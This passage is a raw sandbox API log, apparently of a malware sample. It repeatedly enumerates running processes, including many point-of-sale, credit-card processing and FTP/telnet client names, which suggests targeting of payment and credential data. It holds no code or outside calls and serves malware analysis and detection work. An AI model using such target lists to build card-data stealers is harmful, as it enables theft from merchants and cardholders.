th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0154.420] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0154.422] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0154.424] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0154.426] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0154.428] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0154.430] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0154.432] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0154.433] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0154.435] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0154.437] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0154.439] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0154.441] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0154.442] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0154.447] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0154.449] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0154.451] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0154.453] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0154.455] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0154.456] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0154.458] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0154.460] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0154.461] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0154.463] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0154.465] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0154.466] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0154.468] CloseHandle (hObject=0x1c7c) returned 1 [0154.468] Sleep (dwMilliseconds=0x64) [0154.632] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b90 [0154.650] Process32First (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.652] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0154.655] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0154.657] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.659] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0154.661] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.664] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0154.666] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0154.704] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.706] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.709] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.711] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.714] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.717] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.719] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.721] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.724] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.726] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.728] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.730] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.733] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0154.735] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.741] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0154.752] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.754] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0154.756] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0154.758] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0154.761] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0154.763] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0154.765] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0154.767] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.769] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0154.772] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0154.774] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0154.777] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0154.779] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.781] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0154.783] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0154.785] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0154.792] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0154.794] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0154.796] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0154.798] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0154.800] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0154.802] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0154.804] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0154.808] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0154.810] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0154.812] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0154.814] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0154.816] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0154.819] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0154.821] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0154.823] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0154.824] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0154.829] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0154.831] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0154.833] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0154.836] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 